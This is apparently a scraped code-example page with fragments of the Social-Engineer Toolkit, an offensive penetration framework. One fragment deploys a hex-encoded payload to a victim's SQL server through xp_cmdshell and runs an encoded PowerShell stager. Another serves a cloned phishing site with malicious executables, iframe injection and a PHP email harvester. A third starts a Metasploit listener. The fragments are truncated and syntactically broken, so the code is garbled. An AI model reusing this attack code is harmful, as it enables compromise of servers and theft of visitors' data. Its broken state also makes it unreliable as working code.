    fileopen = file("src/program_junk/payload.hex", "r")
    #random_exe = setcore.generate_random_string(10,15)
    while fileopen:
        data = fileopen.read(900).rstrip()
        # if data is done then break out of loop because file is over
        if data == "": break
        setcore.PrintStatus("Deploying payload to victim machine (hex): " +
                            setcore.bcolors.BOLD + str(data) +
                            setcore.bcolors.ENDC + "\n")
        target_server.execute_query("xp_cmdshell 'echo %s>> %s'" %
                                    (data, random_exe))
        "Delivery complete. Converting hex back to binary format.")

    # if we are using debug conversion then convert our binary
    if option == "2":
        target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" %
        target_server.execute_query("xp_cmdshell '%s %s'" %
                                    (random_file, random_exe))
        # clean up the old files
        setcore.PrintStatus("Cleaning up old files..")
        target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))

    # if we are using SET payload
    if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
        setcore.PrintStatus("Spawning seperate child process for listener...")
            "cp src/program_junk/web_clone/x ./ 1> /dev/null 2>/dev/null",
        # start a threaded webserver in the background
        child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
        # grab the port options
        if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
            fileopen = file("%s/src/program_junk/port.options" % (definepath),
            port = fileopen.read().rstrip()
        # if for some reason the port didnt get created we default to 443
        if not os.path.isfile("%s/src/program_junk/port.options" %
            port = "443"  # default 443
        # launch the python listener through pexpect
        # need to change the directory real quick
        child2 = pexpect.spawn(
            "python src/payloads/set_payloads/listener.py %s" % (port))
        # now back

    setcore.PrintStatus("Triggering payload stager...")
    # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
    import thread
    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        random_exe_execute = random_exe
        random_exe = "powershell -EncodedCommand " + powershell_command

    sql_command = ("xp_cmdshell '%s'" % (random_exe))
    # start thread of SQL command that executes payload
    thread.start_new_thread(target_server.execute_query, (sql_command, ))

    # trigger the exe if option 1 is used
    if option == "1":
        sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
        thread.start_new_thread(target_server.execute_query, (sql_command, ))
    # if pexpect doesnt exit right then it freaks out
        # interact with the child process through pexpect
        subprocess.Popen("rm x 1> /dev/null 2> /dev/null", shell=True).wait()
Exemplo n.º 9
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # remove stale index.html files
        if os.path.isfile("index.html"):
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace(
                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
                            counter = 1
                    if counter == 0:

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW +
                  "[*] Moving payload into cloned website." +
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                    os.path.join(core.setdir, applet_name))
                os.path.join(core.setdir, applet_name),
                os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
                                os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
                                os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
                                os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
                "The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                        os.path.join(core.setdir, "msf.exe"),
                        os.path.join(core.setdir, "web_clone/msf.exe"))
                        "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                    os.path.join(core.setdir, "web_clone/msf.exe"),
                    os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (
            r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:


    if not apache:
        if multiattack_harv == 'off':
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server,
                                                args=(web_port, path))
                                            (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:

            # Handle Exceptions
            except Exception as e:
                    "{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                    "[!] There was an issue, printing error: {1}{2}".format(
                        core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop",
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(
                            args=(web_port, path))

                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
                              format(core.bcolors.RED, core.bcolors.ENDC))

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                                "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
                                "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
                                .format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(
                                core.bcolors.GREEN, core.bcolors.ENDC))

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(
                             os.path.join(definepath, "src/html/*.bin"),
                             os.path.join(definepath, "src/html/*.html"),
                             os.path.join(core.setdir, "web_clone/*"),
                             os.path.join(core.setdir, "msf.exe"),
                             os.path.join(core.setdir, "*.jar"),

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(
                    os.path.join(apache_path, "harvester_{}.txt".format(now)),
                    'w') as filewrite:
            subprocess.Popen("chown www-data:www-data '{0}'".format(
                os.path.join(apache_path, "harvester_{}.txt".format(now))),
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace(
                "<body>", "<body>"
                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
            with open(os.path.join(apache_path, "index.php"),
                      "w") as filewrite:
                "All files have been copied to {}".format(apache_path))


    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()
Exemplo n.º 11
Arquivo: solo.py Projeto: BrzTit/SET
import subprocess
import os
import re
import sys
from src.core import setcore

# definepath

meta_path = setcore.meta_path()

# launch msf listener
setcore.PrintInfo("The payload can be found in the SET home directory.")
choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]"))
if choice == "yes" or choice == "y":

    # if we didn't select the SET interactive shell as our payload
    if not os.path.isfile("src/program_junk/set.payload"):
        setcore.PrintInfo("Please wait while the Metasploit listener is loaded...")
        subprocess.Popen("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path), shell=True).wait()

    # if we did select the set payload as our option
    if os.path.isfile("src/program_junk/set.payload"):
        fileopen = file("src/program_junk/port.options", "r")
        set_payload = file("src/program_junk/set.payload", "r")
        port = fileopen.read().rstrip()
        set_payload = set_payload.read().rstrip()
        if set_payload == "SETSHELL":
Exemplo n.º 12
